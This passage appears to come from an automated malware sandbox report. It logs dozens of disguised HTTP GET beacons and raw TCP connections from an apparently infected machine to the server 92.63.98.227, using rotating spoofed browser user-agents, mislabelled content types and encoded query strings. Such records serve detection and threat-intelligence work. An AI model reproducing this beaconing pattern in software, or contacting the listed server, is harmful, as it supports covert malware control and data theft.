Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
